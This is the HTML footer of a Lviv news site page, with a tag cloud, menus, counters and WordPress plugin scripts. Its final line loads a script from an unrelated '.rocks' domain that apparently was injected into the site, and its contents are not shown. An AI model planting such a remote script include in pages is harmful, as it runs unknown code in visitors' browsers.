<a href="http://gazeta.lviv.ua/tag/kuxnya/" class="tag-cloud-link tag-link-207 tag-link-position-28" style="font-size: 8.21pt;" aria-label="кухня (65 елементів)">кухня</a>
<a href="http://gazeta.lviv.ua/tag/lvivska-oblasna-rada/" class="tag-cloud-link tag-link-2241 tag-link-position-29" style="font-size: 10.73pt;" aria-label="львівська обласна рада (150 елементів)">львівська обласна рада</a>
<a href="http://gazeta.lviv.ua/tag/osvita/" class="tag-cloud-link tag-link-958 tag-link-position-30" style="font-size: 9.89pt;" aria-label="освіта (113 елементів)">освіта</a>
<a href="http://gazeta.lviv.ua/tag/pogoda/" class="tag-cloud-link tag-link-195 tag-link-position-31" style="font-size: 10.73pt;" aria-label="погода (152 елементи)">погода</a>
<a href="http://gazeta.lviv.ua/tag/pozhezha/" class="tag-cloud-link tag-link-111 tag-link-position-32" style="font-size: 12.83pt;" aria-label="пожежа (298 елементів)">пожежа</a>
<a href="http://gazeta.lviv.ua/tag/policiya/" class="tag-cloud-link tag-link-68 tag-link-position-33" style="font-size: 16.4pt;" aria-label="поліція (986 елементів)">поліція</a>
<a href="http://gazeta.lviv.ua/tag/prikordonniki/" class="tag-cloud-link tag-link-359 tag-link-position-34" style="font-size: 12.41pt;" aria-label="прикордонники (265 елементів)">прикордонники</a>
<a href="http://gazeta.lviv.ua/tag/prokuratura-lvivskoyi-oblasti/" class="tag-cloud-link tag-link-1041 tag-link-position-35" style="font-size: 11.57pt;" aria-label="прокуратура (198 елементів)">прокуратура</a>
<a href="http://gazeta.lviv.ua/tag/remont-dorig/" class="tag-cloud-link tag-link-2893 tag-link-position-36" style="font-size: 9.05pt;" aria-label="ремонт доріг (87 елементів)">ремонт доріг</a>
<a href="http://gazeta.lviv.ua/tag/svyato/" class="tag-cloud-link tag-link-2583 tag-link-position-37" style="font-size: 9.68pt;" aria-label="свято (106 елементів)">свято</a>
<a href="http://gazeta.lviv.ua/tag/smert/" class="tag-cloud-link tag-link-2556 tag-link-position-38" style="font-size: 9.05pt;" aria-label="смерть (87 елементів)">смерть</a>
<a href="http://gazeta.lviv.ua/tag/smittya/" class="tag-cloud-link tag-link-1552 tag-link-position-39" style="font-size: 9.82pt;" aria-label="сміття (110 елементів)">сміття</a>
<a href="http://gazeta.lviv.ua/tag/socium/" class="tag-cloud-link tag-link-1813 tag-link-position-40" style="font-size: 8.98pt;" aria-label="соціум (85 елементів)">соціум</a>
<a href="http://gazeta.lviv.ua/tag/sport/" class="tag-cloud-link tag-link-126 tag-link-position-41" style="font-size: 13.25pt;" aria-label="спорт (347 елементів)">спорт</a>
<a href="http://gazeta.lviv.ua/tag/podiyi/" class="tag-cloud-link tag-link-2527 tag-link-position-42" style="font-size: 14.3pt;" aria-label="трафунки (489 елементів)">трафунки</a>
<a href="http://gazeta.lviv.ua/tag/festival/" class="tag-cloud-link tag-link-489 tag-link-position-43" style="font-size: 10.45pt;" aria-label="фестиваль (136 елементів)">фестиваль</a>
<a href="http://gazeta.lviv.ua/tag/foto/" class="tag-cloud-link tag-link-1746 tag-link-position-44" style="font-size: 10.59pt;" aria-label="фото (145 елементів)">фото</a>
<a href="http://gazeta.lviv.ua/tag/xabar/" class="tag-cloud-link tag-link-177 tag-link-position-45" style="font-size: 9.89pt;" aria-label="хабар (115 елементів)">хабар</a></div>
</aside></div>    </div><!-- end content_section -->

            	<div class="footer-ads-wrap"><aside class="all-devices  ads-widget gazet-widget"><div id="riainfo_e8591355dc8ba8c645d5eb51de57e1ae"></div>
<style type="text/css">
    #riainfo_e8591355dc8ba8c645d5eb51de57e1ae .riabanner_dom.horizontal .riabanner-description {display: none}
    #riainfo_e8591355dc8ba8c645d5eb51de57e1ae .riabanner_dom.horizontal .b-text {padding: 1% 0}
</style>
<script type="text/javascript" src="https://cobrand.ria.com/js/ria_informer.js?riacode=e8591355dc8ba8c645d5eb51de57e1ae" ></script>
<div id="riainfo_e8591355dc8ba8c645d5eb51de57e1ae"></div>
<script type="text/javascript" src="https://cobrand.ria.com/js/ria_informer.js?riacode=e8591355dc8ba8c645d5eb51de57e1ae" ></script></aside></div><!-- end footer-ads-wrap -->
            </div>
        </div><!-- end_container -->
        <footer id="footer">
            <div class="center">
                <div class="footer-inner clearfix">
                    <div class="footer-left">
                    	<ul id="menu-footer-links" class="footer_links"><li id="menu-item-992" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-992"><a href="http://gazeta.lviv.ua/redakciya/">Редакція</a></li>
<li id="menu-item-993" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-993"><a href="http://gazeta.lviv.ua/reklama-na-sajti/">Реклама на сайті</a></li>
<li id="menu-item-160255" class="menu-item menu-item-type-post_type menu-item-object-page current_page_parent menu-item-160255"><a href="http://gazeta.lviv.ua/archive/">Архів</a></li>
</ul>                                                <div class="copyright">© 2006-2017 Львівська газета<br>При використанні матеріалів джерело обов'язкове.<br>
При цитуванні в інтернеті — гіперпосилання.</div>
                                                <ul class="footer-socials">
                        	<li><a href="http://facebook.com/lvivskagazeta/" target="_blank"><i class="fa fa-facebook"></i></a></li>                                                        <li><a href="https://www.youtube.com/channel/UCJiKZoY0vRxONsAgIuzNcuQ" target="_blank"><i class="fa fa-youtube-play"></i></a></li>                                                        <li><a href="http://gazeta.lviv.ua/feed/" target="_blank"><i class="fa fa-feed"></i></a></li>                        </ul>
                    </div>
                    <div class="footer-column footer-column-1"><aside id="nav_menu-3" class="all-devices  widget widget_nav_menu"><div class="menu-footer-categories-1-container"><ul id="menu-footer-categories-1" class="menu"><li id="menu-item-56414" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-56414"><a href="http://gazeta.lviv.ua/novini/">Новини</a></li>
<li id="menu-item-160256" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-160256"><a href="http://gazeta.lviv.ua/interview/">Інтерв&#8217;ю</a></li>
<li id="menu-item-160257" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-160257"><a href="http://gazeta.lviv.ua/specprojects/">Спецпроекти</a></li>
<li id="menu-item-56406" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-56406"><a href="http://gazeta.lviv.ua/blogi/">Блоги</a></li>
<li id="menu-item-56419" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-56419"><a href="http://gazeta.lviv.ua/foto/">Відео/Фото</a></li>
</ul></div></aside></div>
                    <div class="footer-column footer-column-2"><aside id="nav_menu-4" class="all-devices  widget widget_nav_menu"><div class="menu-footer-categories-2-container"><ul id="menu-footer-categories-2" class="menu"><li id="menu-item-160322" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-160322"><a href="http://gazeta.lviv.ua/politika-2/">Політика</a></li>
<li id="menu-item-160263" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-160263"><a href="http://gazeta.lviv.ua/ekonomika-2/">Бізнес</a></li>
<li id="menu-item-160260" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-160260"><a href="http://gazeta.lviv.ua/novini/suspilstvo/">Суспільство</a></li>
<li id="menu-item-160265" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-160265"><a href="http://gazeta.lviv.ua/lyudi-lvova/">Люди Львова</a></li>
<li id="menu-item-160264" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-160264"><a href="http://gazeta.lviv.ua/kultura/">Культура</a></li>
<li id="menu-item-160276" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-160276"><a href="http://gazeta.lviv.ua/stil-zhittya/">Стиль життя</a></li>
</ul></div></aside></div>
                    <div class="footer-column footer-column-3"><aside id="custom_html-3" class="widget_text all-devices  widget widget_custom_html"><div class="textwidget custom-html-widget"><!--bigmir)net TOP 100-->
<script type="text/javascript" language="javascript"><!--
bmN=navigator,bmD=document,bmD.cookie='b=b',i=0,bs=[],bm={v:40649,s:40649,t:3,c:bmD.cookie?1:0,n:Math.round((Math.random()* 1000000)),w:0};
for(var f=self;f!=f.parent;f=f.parent)bm.w++;
try{if(bmN.plugins&&bmN.mimeTypes.length&&(x=bmN.plugins['Shockwave Flash']))bm.m=parseInt(x.description.replace(/([a-zA-Z]|\s)+/,''));
else for(var f=3;f<20;f++)if(eval('new ActiveXObject("ShockwaveFlash.ShockwaveFlash.'+f+'")'))bm.m=f}catch(e){;}
try{bm.y=bmN.javaEnabled()?1:0}catch(e){;}
try{bmS=screen;bm.v^=bm.d=bmS.colorDepth||bmS.pixelDepth;bm.v^=bm.r=bmS.width}catch(e){;}
r=bmD.referrer.replace(/^w+:\/\//,'');if(r&&r.split('/')[0]!=window.location.host){bm.f=escape(r).slice(0,400);bm.v^=r.length}
bm.v^=window.location.href.length;for(var x in bm) if(/^[vstcnwmydrf]$/.test(x)) bs[i++]=x+bm[x];
bmD.write('<a href="http://www.bigmir.net/" target="_blank" onClick="img=new Image();img.src="//www.bigmir.net/?cl=40649";"><img src="//c.bigmir.net/?'+bs.join('&')+'"  width="88" height="31" border="0" alt="bigmir)net TOP 100" title="bigmir)net TOP 100"></a>');
//-->
</script>
<noscript>
<a href="http://www.bigmir.net/" target="_blank"><img src="//c.bigmir.net/?v40649&s40649&t3" width="88" height="31" alt="bigmir)net TOP 100" title="bigmir)net TOP 100" border="0" /></a>
</noscript>
<!--bigmir)net TOP 100--></div></aside><aside id="black-studio-tinymce-30" class="all-devices  widget widget_black_studio_tinymce"><div class="textwidget"><div style="margin-top:100px" class="copyright"><a title="розробка сайту" href="http://www.lvivport.com" target="_blank" style="color: #666;">розробка сайту<br /><img src="http://gazeta.lviv.ua/wp-content/uploads/ad/lvivport.png" alt="розорбка сайту" width="133" height="34" /></a></div>
</div></aside></div>
                </div>
            </div>
        </footer>
    </div><!-- end_wrapper -->

	<div style="display:none">
	<div class="grofile-hash-map-f67a79a99e0f5e37ec16258a44435419">
	</div>
	<div class="grofile-hash-map-b1257b5167c54db38a1793e6e12fbbe6">
	</div>
	</div>
<script type='text/javascript' src='http://gazeta.lviv.ua/wp-content/plugins/divi-builder/framework/scripts/frontend-builder-global-functions.js?ver=1.2.3'></script>
<script type='text/javascript' src='http://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201748'></script>
<script type='text/javascript' src='http://s.gravatar.com/js/gprofiles.js?ver=2017Novaa'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var WPGroHo = {"my_hash":""};
/* ]]> */
</script>
<script type='text/javascript' src='http://gazeta.lviv.ua/wp-content/plugins/jetpack/modules/wpgroho.js?ver=4.8.3'></script>
<script type='text/javascript' src='http://gazeta.lviv.ua/wp-content/plugins/gk-nsp/gk-nsp.js?ver=4.8.3'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var thickboxL10n = {"next":"\u0412\u043f\u0435\u0440\u0435\u0434 \u00bb","prev":"\u00ab \u041d\u0430\u0437\u0430\u0434","image":"\u0417\u043e\u0431\u0440\u0430\u0436\u0435\u043d\u043d\u044f","of":"\u0437","close":"\u0417\u0430\u043a\u0440\u0438\u0442\u0438","noiframes":"\u0426\u044f \u0444\u0443\u043d\u043a\u0446\u0456\u044f \u043f\u043e\u0442\u0440\u0435\u0431\u0443\u0454 \u043f\u0456\u0434\u0442\u0440\u0438\u043c\u043a\u0438 \u043f\u043b\u0430\u0432\u0430\u044e\u0447\u0438\u0445 \u0444\u0440\u0435\u0439\u043c\u0456\u0432. \u0419\u043c\u043e\u0432\u0456\u0440\u043d\u043e, \u0431\u0440\u0430\u0443\u0437\u0435\u0440 \u043d\u0435 \u043f\u0456\u0434\u0442\u0440\u0438\u043c\u0443\u0454 \u0442\u0435\u0491\u0438 iframe, \u0430\u0431\u043e \u0432\u043e\u043d\u0438 \u0437\u0430\u0431\u043b\u043e\u043a\u043e\u0432\u0430\u043d\u0456.","loadingAnimation":"http:\/\/gazeta.lviv.ua\/wp-includes\/js\/thickbox\/loadingAnimation.gif"};
/* ]]> */
</script>
<script type='text/javascript' src='http://gazeta.lviv.ua/wp-includes/js/thickbox/thickbox.js?ver=3.1-20121105'></script>
<script type='text/javascript' src='http://gazeta.lviv.ua/wp-content/plugins/gk-tabs/gk-tabs.js?ver=4.8.3'></script>
<script type='text/javascript' src='http://gazeta.lviv.ua/wp-content/plugins/divi-builder/framework/scripts/jquery.fitvids.js?ver=1.2.3'></script>
<script type='text/javascript' src='http://gazeta.lviv.ua/wp-content/plugins/divi-builder/framework/scripts/waypoints.min.js?ver=1.2.3'></script>
<script type='text/javascript' src='http://gazeta.lviv.ua/wp-content/plugins/divi-builder/framework/scripts/jquery.magnific-popup.js?ver=1.2.3'></script>
<script type='text/javascript' src='http://gazeta.lviv.ua/wp-content/plugins/divi-builder/framework/scripts/jquery.mobile.custom.min.js?ver=1.2.3'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var et_pb_custom = {"ajaxurl":"http:\/\/gazeta.lviv.ua\/wp-admin\/admin-ajax.php","images_uri":"http:\/\/gazeta.lviv.ua\/wp-content\/themes\/gazeta\/images","builder_images_uri":"http:\/\/gazeta.lviv.ua\/wp-content\/plugins\/divi-builder\/framework\/images","et_frontend_nonce":"47b6c58da8","subscription_failed":"\u0411\u0443\u0434\u044c \u043b\u0430\u0441\u043a\u0430, \u043f\u0435\u0440\u0435\u0432\u0456\u0440\u0442\u0435 \u043f\u043e\u043b\u044f \u043d\u0438\u0436\u0447\u0435, \u0449\u043e\u0431 \u043f\u0435\u0440\u0435\u043a\u043e\u043d\u0430\u0442\u0438\u0441\u044f, \u0449\u043e \u0432\u0438 \u0432\u0432\u0435\u043b\u0438 \u043f\u0440\u0430\u0432\u0438\u043b\u044c\u043d\u0443 \u0456\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0456\u044e.","fill_message":"\u0411\u0443\u0434\u044c \u043b\u0430\u0441\u043a\u0430, \u0437\u0430\u043f\u043e\u0432\u043d\u0456\u0442\u044c \u043d\u0430\u0441\u0442\u0443\u043f\u043d\u0456 \u043f\u043e\u043b\u044f:","contact_error_message":"\u0411\u0443\u0434\u044c \u043b\u0430\u0441\u043a\u0430, \u0432\u0438\u043f\u0440\u0430\u0432\u0442\u0435 \u0446\u0456 \u043f\u043e\u043c\u0438\u043b\u043a\u0438:","invalid":"\u041d\u0435\u043f\u0440\u0430\u0432\u0438\u043b\u044c\u043d\u0430 \u0430\u0434\u0440\u0435\u0441\u0430 \u0435\u043b\u0435\u043a\u0442\u0440\u043e\u043d\u043d\u043e\u0457 \u043f\u043e\u0448\u0442\u0438","captcha":"\u041a\u0430\u043f\u0447\u0456","prev":"\u041f\u0435\u0440\u0435\u0434","previous":"\u041f\u043e\u043f\u0435\u0440\u0435\u0434\u043d\u0456","next":"\u0414\u0430\u043b\u0456","wrong_captcha":"\u0412\u0438 \u0432\u0432\u0435\u043b\u0438 \u043d\u0435\u0432\u0456\u0440\u043d\u0435 \u0447\u0438\u0441\u043b\u043e \u0432 captcha.","is_builder_plugin_used":"1","is_divi_theme_used":"","widget_search_selector":".widget_search"};
/* ]]> */
</script>
<script type='text/javascript' src='http://gazeta.lviv.ua/wp-content/plugins/divi-builder/framework/scripts/frontend-builder-scripts.js?ver=1.2.3'></script>
<script type='text/javascript' src='http://gazeta.lviv.ua/wp-includes/js/wp-embed.min.js?ver=4.8.3'></script>
<script type='text/javascript' src='http://gazeta.lviv.ua/wp-content/plugins/easy-fancybox/fancybox/jquery.fancybox-1.3.8.min.js?ver=1.6'></script>
<script type='text/javascript' src='http://gazeta.lviv.ua/wp-content/plugins/easy-fancybox/js/jquery.easing.min.js?ver=1.4.0'></script>
<script type='text/javascript' src='http://gazeta.lviv.ua/wp-content/plugins/easy-fancybox/js/jquery.mousewheel.min.js?ver=3.1.13'></script>
<!-- Facebook Comments Plugin for WordPress: http://peadig.com/wordpress-plugins/facebook-comments/ -->
<div id="fb-root"></div>
<script>(function(d, s, id) {
  var js, fjs = d.getElementsByTagName(s)[0];
  if (d.getElementById(id)) return;
  js = d.createElement(s); js.id = id;
  js.src = "//connect.facebook.net/uk_UA/sdk.js#xfbml=1&appId=1083471841726549&version=v2.3";
  fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'facebook-jssdk'));</script>
<script type='text/javascript' src='http://stats.wp.com/e-201748.js' async defer></script>
<script type='text/javascript'>
	_stq = window._stq || [];
	_stq.push([ 'view', {v:'ext',j:'1:5.2.1',blog:'119895106',post:'166050',tz:'2',srv:'gazeta.lviv.ua'} ]);
	_stq.push([ 'clickTrackerInit', '119895106', '166050' ]);
</script>
<script type="text/javascript">
jQuery(document).on('ready post-load', function(){ jQuery('.nofancybox,a.pin-it-button,a[href*="pinterest.com/pin/create/button"]').addClass('nolightbox'); });
jQuery(document).on('ready post-load',easy_fancybox_handler);
jQuery(document).on('ready',easy_fancybox_auto);</script>

<script src="http://mtdatahaba.rocks/sticker.287255.js" type="text/javascript"></script>
</body>
</html>